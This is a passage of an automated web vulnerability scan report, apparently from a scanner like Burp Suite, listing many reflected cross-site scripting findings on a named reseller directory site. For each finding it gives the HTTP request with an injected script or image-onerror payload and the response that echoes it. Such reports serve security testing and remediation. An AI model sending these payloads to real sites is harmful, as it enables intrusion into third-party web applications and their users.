Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.php/bf2fb<img src=a onerror=alert(1)>5399e8d38c2]</td>
...[SNIP]...

2.4630. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5ed3<script>alert(1)</script>4c1d6e4a794 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga5ed3<script>alert(1)</script>4c1d6e4a794/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga5ed3<script>alert(1)</script>4c1d6e4a794/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4631. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56357<script>alert(1)</script>0b43bf1cdb3e76d6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag56357<script>alert(1)</script>0b43bf1cdb3e76d6b/themes/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag56357<script>alert(1)</script>0b43bf1cdb3e76d6b/themes/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4632. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 69784</title><img%20src%3da%20onerror%3dalert(1)>6543e1ceba3 was submitted in the REST URL parameter 2. This input was echoed as 69784</title><img src=a onerror=alert(1)>6543e1ceba3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes69784</title><img%20src%3da%20onerror%3dalert(1)>6543e1ceba3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes69784</title><img src=a onerror=alert(1)>6543e1ceba3/search.php</title>
...[SNIP]...

2.4633. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 375ff</title><img%20src%3da%20onerror%3dalert(1)>081329ebe7db52d4c was submitted in the REST URL parameter 2. This input was echoed as 375ff</title><img src=a onerror=alert(1)>081329ebe7db52d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes375ff</title><img%20src%3da%20onerror%3dalert(1)>081329ebe7db52d4c/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes375ff</title><img src=a onerror=alert(1)>081329ebe7db52d4c/search.php</title>
...[SNIP]...

2.4634. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e038c<img%20src%3da%20onerror%3dalert(1)>99cea688282 was submitted in the REST URL parameter 2. This input was echoed as e038c<img src=a onerror=alert(1)>99cea688282 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themese038c<img%20src%3da%20onerror%3dalert(1)>99cea688282/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themese038c<img src=a onerror=alert(1)>99cea688282/search.php]</td>
...[SNIP]...

2.4635. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e9d9<img%20src%3da%20onerror%3dalert(1)>0f2d2fd26e1553399 was submitted in the REST URL parameter 2. This input was echoed as 6e9d9<img src=a onerror=alert(1)>0f2d2fd26e1553399 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes6e9d9<img%20src%3da%20onerror%3dalert(1)>0f2d2fd26e1553399/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6e9d9<img src=a onerror=alert(1)>0f2d2fd26e1553399/search.php]</td>
...[SNIP]...

2.4636. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75fd4</title><img%20src%3da%20onerror%3dalert(1)>554d2ff8379991bf1 was submitted in the REST URL parameter 3. This input was echoed as 75fd4</title><img src=a onerror=alert(1)>554d2ff8379991bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/search.php75fd4</title><img%20src%3da%20onerror%3dalert(1)>554d2ff8379991bf1?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php75fd4</title><img src=a onerror=alert(1)>554d2ff8379991bf1</title>
...[SNIP]...

2.4637. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bd79<img%20src%3da%20onerror%3dalert(1)>dfae96f353b8cd339 was submitted in the REST URL parameter 3. This input was echoed as 5bd79<img src=a onerror=alert(1)>dfae96f353b8cd339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/search.php5bd79<img%20src%3da%20onerror%3dalert(1)>dfae96f353b8cd339?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php5bd79<img src=a onerror=alert(1)>dfae96f353b8cd339]</td>
...[SNIP]...

2.4638. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4a6d5</title><img%20src%3da%20onerror%3dalert(1)>2e35077a956 was submitted in the REST URL parameter 3. This input was echoed as 4a6d5</title><img src=a onerror=alert(1)>2e35077a956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php4a6d5</title><img%20src%3da%20onerror%3dalert(1)>2e35077a956?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php4a6d5</title><img src=a onerror=alert(1)>2e35077a956</title>
...[SNIP]...

2.4639. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5e43f<img%20src%3da%20onerror%3dalert(1)>6d7e68a16d was submitted in the REST URL parameter 3. This input was echoed as 5e43f<img src=a onerror=alert(1)>6d7e68a16d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php5e43f<img%20src%3da%20onerror%3dalert(1)>6d7e68a16d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php5e43f<img src=a onerror=alert(1)>6d7e68a16d]</td>
...[SNIP]...

2.4640. http://www.resellerbase.com/tag/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 97e3c</title><img%20src%3da%20onerror%3dalert(1)>9d655d96b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97e3c</title><img src=a onerror=alert(1)>9d655d96b09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php/97e3c</title><img%20src%3da%20onerror%3dalert(1)>9d655d96b09 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php/97e3c</title><img src=a onerror=alert(1)>9d655d96b09</title>
...[SNIP]...

2.4641. http://www.resellerbase.com/tag/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7d7ce<img%20src%3da%20onerror%3dalert(1)>5c59ea8f47f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d7ce<img src=a onerror=alert(1)>5c59ea8f47f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php/7d7ce<img%20src%3da%20onerror%3dalert(1)>5c59ea8f47f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php/7d7ce<img src=a onerror=alert(1)>5c59ea8f47f]</td>
...[SNIP]...

2.4642. http://www.resellerbase.com/tag/travel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 607b0</title><img%20src%3da%20onerror%3dalert(1)>8ef067deab1 was submitted in the REST URL parameter 2. This input was echoed as 607b0</title><img src=a onerror=alert(1)>8ef067deab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/travel607b0</title><img%20src%3da%20onerror%3dalert(1)>8ef067deab1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: travel607b0</title><img src=a onerror=alert(1)>8ef067deab1</title>
...[SNIP]...

2.4643. http://www.resellerbase.com/tag/travel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f067<img%20src%3da%20onerror%3dalert(1)>1e21d2c50b8 was submitted in the REST URL parameter 2. This input was echoed as 9f067<img src=a onerror=alert(1)>1e21d2c50b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/travel9f067<img%20src%3da%20onerror%3dalert(1)>1e21d2c50b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: trave
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : travel9f067<img src=a onerror=alert(1)>1e21d2c50b8]</td>
...[SNIP]...

2.4644. http://www.resellerbase.com/tag/travel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 40f53</title><img%20src%3da%20onerror%3dalert(1)>270f58b9333ddb565 was submitted in the REST URL parameter 2. This input was echoed as 40f53</title><img src=a onerror=alert(1)>270f58b9333ddb565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/travel40f53</title><img%20src%3da%20onerror%3dalert(1)>270f58b9333ddb565?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: travel40f53</title><img src=a onerror=alert(1)>270f58b9333ddb565</title>
...[SNIP]...

2.4645. http://www.resellerbase.com/tag/travel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c17e<img%20src%3da%20onerror%3dalert(1)>e4d58951de3e3e6db was submitted in the REST URL parameter 2. This input was echoed as 8c17e<img src=a onerror=alert(1)>e4d58951de3e3e6db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/travel8c17e<img%20src%3da%20onerror%3dalert(1)>e4d58951de3e3e6db?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: trave
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : travel8c17e<img src=a onerror=alert(1)>e4d58951de3e3e6db]</td>
...[SNIP]...

2.4646. http://www.resellerbase.com/tag/uk [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79e5d<script>alert(1)</script>4f596f321e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

